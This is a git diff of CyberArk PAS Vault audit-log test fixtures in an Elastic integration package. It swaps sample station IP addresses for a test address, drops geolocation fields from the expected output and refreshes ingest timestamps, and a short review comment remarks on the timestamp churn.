-<5>1 2021-03-11T17:38:13Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 81.32.170.205\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:20Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:20","IsoTimestamp":"2021-03-10T09:11:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"Administrator","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMPConf","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}}
+<5>1 2021-03-11T17:38:13Z VAULT 
{"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:13\n 2021-03-11T17:38:13Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 185\n Add Safe\n Info\n PSMPApp_VAGRANT\n Add Safe\n \n \n PSMRecordings\n \n 67.43.156.13\n \n \n \n \n \n Add Safe\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:13","IsoTimestamp":"2021-03-11T17:38:13Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"185","Desc":"Add Safe","Severity":"Info","Issuer":"PSMPApp_VAGRANT","Action":"Add Safe","SourceUser":"","TargetUser":"","Safe":"PSMRecordings","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Safe","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json index 356f4927619..46671324d08 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-185-add-safe.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -37,7 +25,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -46,7 +34,7 @@ "rfc5424": true, "iso_timestamp": "2021-03-10T09:11:20Z", "safe": "PSMPConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Safe", "message": "Add Safe", "issuer": "Administrator", 
@@ -60,8 +48,8 @@ "event": { "severity": 2, "action": "add safe", - "ingested": "2021-06-09T10:24:28.925889300Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:39.177420800Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:20\",\"IsoTimestamp\":\"2021-03-10T09:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPConf\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", "code": "185", "kind": "event" } 
@@ -73,20 +61,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -103,7 +79,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { 
@@ -112,8 +88,8 @@ "rfc5424": true, "iso_timestamp": "2021-03-11T17:38:13Z", "safe": "PSMRecordings", - "station": "81.32.170.205", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e185\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "station": "67.43.156.13", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e185\u003c/MessageID\u003e\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\n 
\u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\n \u003cFile\u003e\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "action": "Add Safe", "message": "Add Safe", "issuer": "PSMPApp_VAGRANT", 
@@ -127,8 +103,8 @@ "event": { "severity": 2, "action": "add safe", - "ingested": "2021-06-09T10:24:28.925919900Z", - "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e185\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add Safe\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add 
Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:39.177430400Z", + "original": "\u003c5\u003e1 2021-03-11T17:38:13Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 09:38:13\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T17:38:13Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e185\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Safe\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_VAGRANT\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Safe\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMRecordings\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Safe\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 09:38:13\",\"IsoTimestamp\":\"2021-03-11T17:38:13Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"185\",\"Desc\":\"Add 
Safe\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_VAGRANT\",\"Action\":\"Add Safe\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMRecordings\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Safe\",\"GatewayStation\":\"\"}}}", "code": "185", "kind": "event" } diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log index 3f7fa511cc8..a9d4c8d1111 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log 
@@ -1,2 +1,2 @@
-<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}}
+<5>1 2021-03-10T09:11:40Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 01:11:40","IsoTimestamp":"2021-03-10T09:11:40Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"Administrator","Action":"Add Folder","SourceUser":"","TargetUser":"","Safe":"PSMPADBridgeConf","File":"Root\\Scripts\\","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}}
 <5>1 2021-03-11T18:01:14Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 10:01:14\n 2021-03-11T18:01:14Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 187\n Add Folder\n Info\n PVWAAppUser\n Add Folder\n \n \n PSMUnmanagedSessionAccounts\n Root\\2\\\n 10.0.1.20\n \n \n \n \n \n Add Folder\n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 10:01:14","IsoTimestamp":"2021-03-11T18:01:14Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"187","Desc":"Add Folder","Severity":"Info","Issuer":"PVWAAppUser","Action":"Add 
Folder","SourceUser":"","TargetUser":"","Safe":"PSMUnmanagedSessionAccounts","File":"Root\\2\\","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Add Folder","GatewayStation":""}}} diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json index f4bc1be2354..2d423ba5584 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-187-add-folder.log-expected.json @@ -7,20 +7,8 @@ } }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -40,7 +28,7 @@ }, "related": { "ip": [ - "81.32.170.205" + "67.43.156.13" ] }, "cyberarkpas": { @@ -50,7 +38,7 @@ "iso_timestamp": "2021-03-10T09:11:40Z", "file": "Root\\Scripts\\", "safe": "PSMPADBridgeConf", - "station": "81.32.170.205", + "station": "67.43.156.13", "action": "Add Folder", "message": "Add Folder", "issuer": "Administrator", 
@@ -64,8 +52,8 @@ "event": { "severity": 2, "action": "add folder", - "ingested": "2021-06-09T10:24:28.978084Z", - "original": "\u003c5\u003e1 2021-03-10T09:11:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:40\",\"IsoTimestamp\":\"2021-03-10T09:11:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"Root\\\\Scripts\\\\\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", + "ingested": "2021-12-09T13:36:39.355913600Z", + "original": "\u003c5\u003e1 2021-03-10T09:11:40Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:40\",\"IsoTimestamp\":\"2021-03-10T09:11:40Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Add Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPADBridgeConf\",\"File\":\"Root\\\\Scripts\\\\\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", "code": "187", "kind": "event" } 
@@ -123,7 +111,7 @@ "event": { "severity": 2, "action": "add folder", - "ingested": "2021-06-09T10:24:28.978100500Z", + "ingested": "2021-12-09T13:36:39.355922200Z", "original": "\u003c5\u003e1 2021-03-11T18:01:14Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 10:01:14\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T18:01:14Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e187\u003c/MessageID\u003e\\n \u003cDesc\u003eAdd Folder\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePVWAAppUser\u003c/Issuer\u003e\\n \u003cAction\u003eAdd Folder\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMUnmanagedSessionAccounts\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\2\\\\\u003c/File\u003e\\n \u003cStation\u003e10.0.1.20\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eAdd Folder\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 10:01:14\",\"IsoTimestamp\":\"2021-03-11T18:01:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"187\",\"Desc\":\"Add Folder\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Add 
Folder\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMUnmanagedSessionAccounts\",\"File\":\"Root\\\\2\\\\\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Add Folder\",\"GatewayStation\":\"\"}}}", "code": "187", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log index 88926eb1571..2794595cff7 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-19-full-gateway-connection.log 
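Review bot: The only change in this hunk is `event.ingested`, a wall-clock value stamped when the expected file was regenerated, so this document will keep churning on every regeneration regardless of whether the pipeline changed. If the pipeline test harness supports declaring fields as dynamic, `event.ingested` is the natural candidate for that list; if it does not, a short note in the data stream's test configuration saying that `event.ingested` is expected to drift would save the next reviewer from reading these lines as a meaningful difference. Separating such timestamp-only churn from the IP substitution would also make the substantive part of this commit easier to audit.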
@@ -1,9 +1,9 @@
 <5>1 2021-03-08T18:07:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:07:51","IsoTimestamp":"2021-03-08T18:07:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
-<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"37.223.7.45","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-09T08:32:51Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 
00:32:51","IsoTimestamp":"2021-03-09T08:32:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
+<5>1 2021-03-09T10:14:58Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 09 02:14:58","IsoTimestamp":"2021-03-09T10:14:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
 <5>1 2021-03-10T08:31:50Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 00:31:50","IsoTimestamp":"2021-03-10T08:31:50Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full Gateway Connection","Severity":"Info","Issuer":"PasswordManager","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
 <5>1 2021-03-10T22:37:00Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:37:00","IsoTimestamp":"2021-03-10T22:37:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"19","Desc":"Full 
Gateway Connection","Severity":"Info","Issuer":"Administrator","Action":"Full Gateway Connection","SourceUser":"PVWAGWUser","TargetUser":"","Safe":"","File":"","Station":"10.0.1.10","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Full Gateway Connection","GatewayStation":"10.0.1.20"}}}
